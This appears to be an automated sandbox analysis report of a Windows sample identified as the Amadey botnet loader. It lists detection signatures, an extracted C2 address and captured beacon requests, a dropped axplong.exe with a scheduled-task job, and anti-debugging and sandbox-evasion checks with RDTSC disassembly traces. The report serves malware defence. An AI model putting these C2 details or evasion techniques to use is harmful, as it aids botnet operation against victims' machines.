Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520516
MD5: e3aa1042729bc6d0ddbed39ddb48b872
SHA1: d9642336d578f012359bbd1f49c90798a76d92ac
SHA256: 14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
Tags: exe, user-Bitsight

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 52%
Source: file.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49711 -> 185.215.113.16:80
Source: Malware configuration extractor IPs: 185.215.113.16
Source: global traffic HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Source: global traffic HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 152
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: Joe Sandbox View IP Address: 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0040BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_0040BD60
Source: unknown HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOF_i
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded6
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
Source: file.exe Static PE information: Section: ZLIB complexity 0.9972060200953679
Source: file.exe Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9972060200953679
Source: axplong.exe.0.dr Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll, winmm.dll, wininet.dll, sspicli.dll, kernel.appcore.dll, uxtheme.dll, mstask.dll, windows.storage.dll, wldp.dll, mpr.dll, dui70.dll, duser.dll, chartv.dll, onecoreuapcommonproxystub.dll, oleacc.dll, atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wtsapi32.dll, winsta.dll, textshaping.dll, propsys.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, explorerframe.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll, winmm.dll, wininet.dll, kernel.appcore.dll, sspicli.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: file.exe Static file information: File size 1942016 > 1048576
Source: file.exe Static PE information: Raw size of wpzcbdbk is bigger than: 0x100000 < 0x1a8600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
Source: file.exe Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: wpzcbdbk
Source: file.exe Static PE information: section name: remsbmyf
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: wpzcbdbk
Source: axplong.exe.0.dr Static PE information: section name: remsbmyf
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041D84C push ecx; ret 6_2_0041D85F
Source: file.exe Static PE information: section name: entropy: 7.979919668265035
Source: file.exe Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979919668265035
Source: axplong.exe.0.dr Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2A84 second address: 1F2AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0B050E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F84B0B050D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AA7 second address: 1F2AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AAF second address: 1F2AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AB5 second address: 1F2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24AF36 second address: 24AF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24AF3A second address: 24AF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BE58 second address: 24BE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B138 second address: 24B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BE66 second address: 24BEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84B0B050D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f and bx, B93Ch 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F84B0B050D8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122DB75Fh], edx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F84B0B050DFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B13C second address: 24B140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BEB4 second address: 24BEBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B140 second address: 24B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B146 second address: 24B16E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B24A second address: 24B254 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24C054 second address: 24C05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24C05B second address: 24C0F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F84B0D655F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38A5h] 0x00000015 mov bx, si 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F84B0D655F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 cld 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 movzx ebx, di 0x00000044 mov eax, dword ptr [ebp+122D0DA1h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F84B0D655F8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2A3Eh] 0x0000006a push FFFFFFFFh 0x0000006c clc 0x0000006d nop 0x0000006e jne 00007F84B0D655FAh 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F84B0D655FFh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC53 second address: 24DC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC57 second address: 24DC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0D65602h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC77 second address: 24DC81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC81 second address: 24DCE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, 0CDFFFF4h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F84B0D655F8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D23EAh], edx 0x00000031 push 00000000h 0x00000033 jmp 00007F84B0D655FAh 0x00000038 xor edi, dword ptr [ebp+122D33ABh] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 pop edi 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F84B0D655F6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 251ADD second address: 251AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F84B0B050F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050DFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 251AFC second address: 251B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252B80 second address: 252B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F84B0B050D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252B90 second address: 252BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov edi, 5D9211F7h 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D23A3h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F84B0D655F8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 and bl, FFFFFFCDh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252BDE second address: 252BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252BFC second address: 252C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253B33 second address: 253BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F84B0B050D8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 and di, F47Bh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F84B0B050D8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1246280Eh], edi 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D1C8Ah] 0x00000052 jmp 00007F84B0B050E8h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jmp 00007F84B0B050E7h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BC8 second address: 253BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65603h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BE4 second address: 253BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BEA second address: 253BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250C8A second address: 250C9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250C9C second address: 250CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250CA1 second address: 250D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F84B0B050E9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 or ebx, 3BA8A5A0h 0x0000001c or dword ptr [ebp+1246A2CCh], eax 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push ebx 0x0000002a jnc 00007F84B0B050DCh 0x00000030 pop ebx 0x00000031 mov di, 1649h 0x00000035 mov eax, dword ptr [ebp+122D0269h] 0x0000003b mov edi, dword ptr [ebp+122D229Ah] 0x00000041 push FFFFFFFFh 0x00000043 mov di, ax 0x00000046 push edx 0x00000047 pop edi 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F84B0B050E4h 0x00000051 jmp 00007F84B0B050DEh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250D28 second address: 250D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D53 second address: 252D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250D41 second address: 250D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D57 second address: 252D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
